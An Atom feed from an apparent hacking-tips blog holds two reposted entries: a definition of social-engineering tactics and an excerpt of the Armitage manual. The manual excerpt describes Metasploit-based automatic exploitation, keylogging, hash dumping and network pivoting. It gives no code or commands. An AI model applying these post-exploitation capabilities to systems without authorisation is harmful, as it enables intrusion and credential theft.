<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:blogger='http://schemas.google.com/blogger/2008' xmlns:georss='http://www.georss.org/georss' xmlns:gd="http://schemas.google.com/g/2005" xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-3274283599470026861</id><updated>2024-12-18T19:29:39.719-08:00</updated><category term="hacking"/><category term="web"/><category term="Android"/><category term="Social Engineering"/><category term="others"/><category term="tool"/><category term="wireless"/><category term="Tricks"/><category term="windows"/><title type='text'>Toxic Cloud Hacking And Tricks</title><subtitle type='html'>A blog about hacking tutorials to turn you from a n00b to a L33t.&#xa;Latest hacking tips and tricks.</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://toxiccloud.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3274283599470026861/posts/default'/><link rel='alternate' type='text/html' href='http://toxiccloud.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/15337053438654229797</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>20</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-3274283599470026861.post-3776982151221324380</id><published>2013-08-01T00:29:00.000-07:00</published><updated>2013-08-01T00:29:36.224-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Social Engineering"/><title type='text'>Social Engineering</title><content type='html'>&lt;div style=&quot;background-color: white; font-family: Calibri, Helvetica, Arial, sans-serif; line-height: 19.1875px; margin-bottom: 20px;&quot;&gt;
&lt;span style=&quot;font-size: x-large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; font-family: Calibri, Helvetica, Arial, sans-serif; line-height: 19.1875px; margin-bottom: 20px;&quot;&gt;
&lt;span style=&quot;font-size: x-large;&quot;&gt;SE&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; font-family: Calibri, Helvetica, Arial, sans-serif; font-size: 16px; line-height: 19.1875px; margin-bottom: 20px;&quot;&gt;
Social engineering is a term that describes a non-technical kind of intrusion that relies heavily on human interaction and often involves tricking other people to break normal security procedures.&lt;/div&gt;
&lt;div style=&quot;background-color: white; font-family: Calibri, Helvetica, Arial, sans-serif; font-size: 16px; line-height: 19.1875px; margin-bottom: 20px;&quot;&gt;
&lt;/div&gt;
&lt;div style=&quot;background-color: white; font-family: Calibri, Helvetica, Arial, sans-serif; font-size: 16px; line-height: 19.1875px; margin-bottom: 20px;&quot;&gt;
A social engineer runs what used to be called a &quot;con game.&quot; For example, a person using social engineering to break into a computer network might try to gain the confidence of an authorized user and get them to reveal information that compromises the network&#39;s security. Social engineers often rely on the natural helpfulness of people as well as on their weaknesses. They might, for example, call the authorized employee with some kind of urgent problem that requires immediate network access. Appeal to vanity, appeal to authority, appeal to greed, and old-fashioned eavesdropping are other typical social engineering techniques.&lt;/div&gt;
&lt;div style=&quot;background-color: white; font-family: Calibri, Helvetica, Arial, sans-serif; font-size: 16px; line-height: 19.1875px; margin-bottom: 20px;&quot;&gt;
Social engineering is a component of many, if not most, types of exploits. Virus writers use social engineering tactics to persuade people to run&amp;nbsp;malware-laden email attachments, phishers use social engineering to convince people to divulge sensitive information, ands careware&amp;nbsp;&amp;nbsp;vendors use social engineering to frighten people into running software that is useless at best and dangerous at worst.&lt;/div&gt;
&lt;div style=&quot;background-color: white; font-family: Calibri, Helvetica, Arial, sans-serif; font-size: 16px; line-height: 19.1875px; margin-bottom: 20px;&quot;&gt;
Another aspect of social engineering relies on people&#39;s inability to keep up with a culture that relies heavily on information technology. Social engineers rely on the fact that people are not aware of the value of the information they possess and are careless about protecting it. Frequently, social engineers will search dumpsters for valuable information, memorize access codes by looking over someone&#39;s shoulder (shoulder surfing), or take advantage of people&#39;s natural inclination to choose passwords that are meaningful to them but can be easily guessed.&lt;/div&gt;
&lt;div style=&quot;background-color: white; font-family: Calibri, Helvetica, Arial, sans-serif; font-size: 16px; line-height: 19.1875px; margin-bottom: 20px;&quot;&gt;
Security experts propose that as our culture becomes more dependent on information, social engineering will remain the greatest threat to any security system. Prevention includes educating people about the value of information, training them to protect it, and increasing people&#39;s awareness of how social engineers operate.&lt;/div&gt;
&lt;div style=&quot;background-color: white; font-family: Calibri, Helvetica, Arial, sans-serif; font-size: 16px; line-height: 19.1875px; margin-bottom: 20px;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; font-family: Calibri, Helvetica, Arial, sans-serif; font-size: 16px; line-height: 19.1875px; margin-bottom: 20px;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; font-family: Calibri, Helvetica, Arial, sans-serif; font-size: 16px; line-height: 19.1875px; margin-bottom: 20px;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; font-family: Calibri, Helvetica, Arial, sans-serif; font-size: 16px; line-height: 19.1875px; margin-bottom: 20px;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; font-family: Calibri, Helvetica, Arial, sans-serif; font-size: 16px; line-height: 19.1875px; margin-bottom: 20px;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; font-family: Calibri, Helvetica, Arial, sans-serif; font-size: 16px; line-height: 19.1875px; margin-bottom: 20px;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; font-family: Calibri, Helvetica, Arial, sans-serif; font-size: 16px; line-height: 19.1875px; margin-bottom: 20px;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; font-family: Calibri, Helvetica, Arial, sans-serif; font-size: 16px; line-height: 19.1875px; margin-bottom: 20px;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; font-family: Calibri, Helvetica, Arial, sans-serif; font-size: 16px; line-height: 19.1875px; margin-bottom: 20px;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; font-family: Calibri, Helvetica, Arial, sans-serif; font-size: 16px; line-height: 19.1875px; margin-bottom: 20px;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; font-family: Calibri, Helvetica, Arial, sans-serif; font-size: 16px; line-height: 19.1875px; margin-bottom: 20px;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; font-family: Calibri, Helvetica, Arial, sans-serif; font-size: 16px; line-height: 19.1875px; margin-bottom: 20px;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; font-family: Calibri, Helvetica, Arial, sans-serif; font-size: 16px; line-height: 19.1875px; margin-bottom: 20px;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; font-family: Calibri, Helvetica, Arial, sans-serif; font-size: 16px; line-height: 19.1875px; margin-bottom: 20px;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; font-family: Calibri, Helvetica, Arial, sans-serif; font-size: 16px; line-height: 19.1875px; margin-bottom: 20px;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; font-family: Calibri, Helvetica, Arial, sans-serif; font-size: 16px; line-height: 19.1875px; margin-bottom: 20px;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; font-family: Calibri, Helvetica, Arial, sans-serif; font-size: 16px; line-height: 19.1875px; margin-bottom: 20px;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; font-family: Calibri, Helvetica, Arial, sans-serif; font-size: 16px; line-height: 19.1875px; margin-bottom: 20px;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; font-family: Calibri, Helvetica, Arial, sans-serif; font-size: 16px; line-height: 19.1875px; margin-bottom: 20px;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; font-family: Calibri, Helvetica, Arial, sans-serif; font-size: 16px; line-height: 19.1875px; margin-bottom: 20px;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; font-family: Calibri, Helvetica, Arial, sans-serif; font-size: 16px; line-height: 19.1875px; margin-bottom: 20px;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; font-family: Calibri, Helvetica, Arial, sans-serif; line-height: 19.1875px; margin-bottom: 20px;&quot;&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;a href=&quot;http://searchsecurity.techtarget.com/definition/social-engineering&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;credit&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://toxiccloud.blogspot.com/feeds/3776982151221324380/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://toxiccloud.blogspot.com/2013/08/social-engineering.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3274283599470026861/posts/default/3776982151221324380'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3274283599470026861/posts/default/3776982151221324380'/><link rel='alternate' type='text/html' href='http://toxiccloud.blogspot.com/2013/08/social-engineering.html' title='Social Engineering'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/15337053438654229797</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3274283599470026861.post-5113886452527283312</id><published>2013-07-29T05:59:00.000-07:00</published><updated>2013-07-29T06:02:31.841-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="tool"/><title type='text'>Armitage</title><content type='html'>&lt;h1 style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 24px; line-height: 20px; margin: 0px auto; padding-bottom: 16px; text-shadow: rgb(51, 51, 51) 4px 4px 8px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;I. Table of Contents&lt;/span&gt;&lt;/h1&gt;
&lt;ol class=&quot;toc&quot; style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px;&quot;&gt;
&lt;li&gt;&lt;span style=&quot;background-color: white;&quot;&gt;&lt;a href=&quot;http://www.fastandeasyhacking.com/manual#0&quot; style=&quot;display: inline-block; width: 10em;&quot;&gt;About Armitage&lt;/a&gt;Before we begin...&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;background-color: white;&quot;&gt;&lt;a href=&quot;http://www.fastandeasyhacking.com/manual#1&quot; style=&quot;display: inline-block; width: 10em;&quot;&gt;Getting Started&lt;/a&gt;How to get any woman to talk to you&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;background-color: white;&quot;&gt;&lt;a href=&quot;http://www.fastandeasyhacking.com/manual#2&quot; style=&quot;display: inline-block; width: 10em;&quot;&gt;User Interface Tour&lt;/a&gt;So many pretty screenshots&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;background-color: white;&quot;&gt;&lt;a href=&quot;http://www.fastandeasyhacking.com/manual#3&quot; style=&quot;display: inline-block; width: 10em;&quot;&gt;Host Management&lt;/a&gt;You&#39;ve got to find them to hack them.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;background-color: white;&quot;&gt;&lt;a href=&quot;http://www.fastandeasyhacking.com/manual#4&quot; style=&quot;display: inline-block; width: 10em;&quot;&gt;Exploitation&lt;/a&gt;This is the fun stuff&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;background-color: white;&quot;&gt;&lt;a href=&quot;http://www.fastandeasyhacking.com/manual#5&quot; style=&quot;display: inline-block; width: 10em;&quot;&gt;Post-Exploitation&lt;/a&gt;This is the&amp;nbsp;really&amp;nbsp;fun stuff&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;background-color: white;&quot;&gt;&lt;a href=&quot;http://www.fastandeasyhacking.com/manual#6&quot; style=&quot;display: inline-block; width: 10em;&quot;&gt;Maneuver&lt;/a&gt;Getting around the network and on to more targets&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;background-color: white;&quot;&gt;&lt;a href=&quot;http://www.fastandeasyhacking.com/manual#7&quot; style=&quot;display: inline-block; width: 10em;&quot;&gt;Team Metasploit&lt;/a&gt;This is cyber attack management!&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;background-color: white;&quot;&gt;&lt;a href=&quot;http://www.fastandeasyhacking.com/manual#8&quot; style=&quot;display: inline-block; width: 10em;&quot;&gt;Scripting Armitage&lt;/a&gt;The next step...&lt;/span&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;h1 style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 24px; line-height: 20px; margin: 0px auto; padding-bottom: 16px; text-shadow: rgb(51, 51, 51) 4px 4px 8px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;1. About Armitage&lt;/span&gt;&lt;/h1&gt;
&lt;h2 style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 19px; line-height: 20px; margin: 0px auto; padding-bottom: 12px; text-shadow: rgb(51, 51, 51) 2px 2px 4px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;1.1 What is Armitage?&lt;/span&gt;&lt;/h2&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Armitage is a&amp;nbsp;&lt;a href=&quot;http://www.fastandeasyhacking.com/manual#8&quot;&gt;scriptable&lt;/a&gt;&amp;nbsp;&lt;a href=&quot;http://www.fastandeasyhacking.com/manual#multi&quot;&gt;red team collaboration&lt;/a&gt;&amp;nbsp;tool for&amp;nbsp;&lt;a href=&quot;http://www.metasploit.com/&quot;&gt;Metasploit&lt;/a&gt;&amp;nbsp;that visualizes targets, recommends exploits, and exposes the advanced post-exploitation features in the framework.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Through one Metasploit instance, your team will:&lt;/span&gt;&lt;/div&gt;
&lt;ul style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-top: 0px; padding-top: 0px;&quot;&gt;
&lt;li&gt;&lt;span style=&quot;background-color: white;&quot;&gt;Use the same sessions&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;background-color: white;&quot;&gt;Share hosts, captured data, and downloaded files&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;background-color: white;&quot;&gt;Communicate through a shared event log.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;background-color: white;&quot;&gt;Run bots to automate red team tasks.&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Armitage is a&amp;nbsp;&lt;a href=&quot;http://www.youtube.com/watch?v=G-JaHWaLmgc&amp;amp;feature=player_embedded&quot;&gt;force multiplier for red team operations&lt;/a&gt;.&lt;/span&gt;&lt;/div&gt;
&lt;h2 style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 19px; line-height: 20px; margin: 0px auto; padding-bottom: 12px; text-shadow: rgb(51, 51, 51) 2px 2px 4px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;1.2 Commercial Support&lt;/span&gt;&lt;/h2&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Armitage is open source software developed by Raphael Mudge&#39;s company Strategic Cyber LLC.&amp;nbsp;&lt;a href=&quot;http://www.advancedpentest.com/&quot;&gt;Cobalt Strike&lt;/a&gt;&amp;nbsp;is the commercially supported big brother of Armitage.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Cobalt Strike adds&amp;nbsp;&lt;a href=&quot;http://www.advancedpentest.com/features&quot;&gt;features&lt;/a&gt;&amp;nbsp;to support professional penetration testers and red teams, including:&lt;/span&gt;&lt;/div&gt;
&lt;ul style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-top: 0px; padding-top: 0px;&quot;&gt;
&lt;li&gt;&lt;a href=&quot;http://www.advancedpentest.com/downloads/reports/hosts_report.pdf&quot; style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;color: black;&quot;&gt;Professional Reports&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;http://www.advancedpentest.com/help-spear-phish&quot; style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;color: black;&quot;&gt;Spear Phishing&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;http://www.advancedpentest.com/help-firefox-addon-attack&quot; style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;color: black;&quot;&gt;Web Drive-by Attacks&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;http://www.advancedpentest.com/help-system-profiler&quot; style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;color: black;&quot;&gt;Client-side Reconaissance&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;http://www.advancedpentest.com/help-covert-vpn&quot; style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;color: black;&quot;&gt;VPN Pivoting&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;http://www.advancedpentest.com/help-beacon&quot; style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;color: black;&quot;&gt;Covert Command and Control&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 19px; line-height: 20px; margin: 0px auto; padding-bottom: 12px; text-shadow: rgb(51, 51, 51) 2px 2px 4px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;1.3 Cyber Attack Management&lt;/span&gt;&lt;/h2&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Armitage organizes Metasploit&#39;s capabilities around the hacking process. There are features for discovery, access, post-exploitation, and maneuver. This section describes these features at a high-level, the rest of this manual covers these capabilities in detail.&lt;/span&gt;&lt;/div&gt;
&lt;center style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://www.fastandeasyhacking.com/images/hackingprocess.png&quot; width=&quot;450&quot; /&gt;&lt;/span&gt;&lt;/center&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Armitage&#39;s dynamic workspaces let you define and switch between target criteria quickly. Use this to segment thousands of hosts into target sets. Armitage also launches scans and imports data from many security scanners. Armitage visualizes your current targets so you&#39;ll know the hosts you&#39;re working with and where you have sessions.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Armitage recommends exploits and will optionally run active checks to tell you which exploits will work. If these options fail, use the Hail Mary attack to unleash Armitage&#39;s smart automatic exploitation against your targets.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Once you&#39;re in, Armitage exposes&amp;nbsp;&lt;a href=&quot;http://www.fastandeasyhacking.com/manual#5&quot;&gt;post-exploitation&lt;/a&gt;&amp;nbsp;tools built into the Meterpreter agent. With the click of a menu you will escalate your privileges, log keystrokes, dump password hashes, browse the file system, and use command shells.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Armitage makes it trivial to setup and use pivots. You&#39;ll use compromised hosts as a hop to attack your target&#39;s network from the inside. Armitage uses Metasploit&#39;s SOCKS proxy module to let you use external tools through your pivots. These features allow you to&amp;nbsp;&lt;a href=&quot;http://www.fastandeasyhacking.com/manual#6&quot;&gt;maneuver&lt;/a&gt;&amp;nbsp;through the network.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;The rest of this manual is organized around this process, providing what you need to know in the order you&#39;ll need it.&lt;/span&gt;&lt;/div&gt;
&lt;h2 style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 19px; line-height: 20px; margin: 0px auto; padding-bottom: 12px; text-shadow: rgb(51, 51, 51) 2px 2px 4px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;1.4 Necessary Vocabulary&lt;/span&gt;&lt;/h2&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;a href=&quot;http://www.blogger.com/blogger.g?blogID=3274283599470026861&quot; name=&quot;0&quot; style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; text-decoration: underline;&quot;&gt;&lt;/a&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px;&quot;&gt;To use Armitage, it helps to understand Metasploit. Here are a few things you must know:&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;a href=&quot;http://www.metasploit.com/&quot;&gt;Metasploit&lt;/a&gt;&amp;nbsp;is a console driven application. Anything you do in Armitage is translated into a command Metasploit understands. You can bypass Armitage and type commands yourself (covered later). If you&#39;re lost in a console, type&lt;code&gt;help&lt;/code&gt;&amp;nbsp;and hit enter.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Metasploit presents its capabilities as&amp;nbsp;modules. Every scanner, exploit, and payload is available as a module. To launch a module, you must set one or more options to configure the module. This process is uniform for all modules and Armitage makes this process easier for you.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;When you exploit a host, you will have a&amp;nbsp;session&amp;nbsp;on that host. Armitage knows how to interact with shell and meterpreter sessions.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Meterpreter&amp;nbsp;is an advanced agent that makes a lot of post-exploitation functionality available to you. Armitage is built to take advantage of Meterpreter. Working with Meterpreter is covered later.&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;tip&quot; style=&quot;border: 1px dashed rgb(136, 136, 136); font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-bottom: 1em; margin-left: 4em; margin-right: 4em; padding: 1em 1em 15px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;The&amp;nbsp;&lt;a href=&quot;http://www.offensive-security.com/metasploit-unleashed/Metasploit_Unleashed_Information_Security_Training&quot;&gt;Metasploit Unleashed course&lt;/a&gt;&amp;nbsp;maintained by the&amp;nbsp;&lt;a href=&quot;http://www.offensive-security.com/&quot;&gt;Offensive Security&lt;/a&gt;&amp;nbsp;folks is excellent. I recommend reading it before going further.&lt;/span&gt;&lt;/div&gt;
&lt;h1 style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 24px; line-height: 20px; margin: 0px auto; padding-bottom: 16px; text-shadow: rgb(51, 51, 51) 4px 4px 8px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;2. Getting Started&lt;/span&gt;&lt;/h1&gt;
&lt;h2 style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 19px; line-height: 20px; margin: 0px auto; padding-bottom: 12px; text-shadow: rgb(51, 51, 51) 2px 2px 4px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;2.1 Requirements&lt;/span&gt;&lt;/h2&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Armitage exists as a client and a server that allow red team collaboration to happen. The Armitage client package is made available for Windows, MacOS X, and Linux. Armitage does NOT require a local copy of the Metasploit Framework to connect to&amp;nbsp;&lt;a href=&quot;http://www.fastandeasyhacking.com/manual#7&quot;&gt;a team server&lt;/a&gt;.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;These getting started instructions are written assuming that you would like to connect to a local instance of the Metasploit Framework.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Armitage requires the following:&lt;/span&gt;&lt;/div&gt;
&lt;ul style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-top: 0px; padding-top: 0px;&quot;&gt;
&lt;li&gt;&lt;span style=&quot;background-color: white;&quot;&gt;&lt;a href=&quot;http://www.metasploit.com/&quot;&gt;Metasploit Framework&lt;/a&gt;&amp;nbsp;and its dependencies.&lt;/span&gt;&lt;ul style=&quot;margin-top: 0px; padding-top: 0px;&quot;&gt;
&lt;li&gt;&lt;span style=&quot;background-color: white;&quot;&gt;PostgreSQL Database&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;background-color: white;&quot;&gt;Nmap&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;background-color: white;&quot;&gt;Oracle&#39;s&amp;nbsp;&lt;a href=&quot;http://www.java.com/&quot;&gt;Java 1.7&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
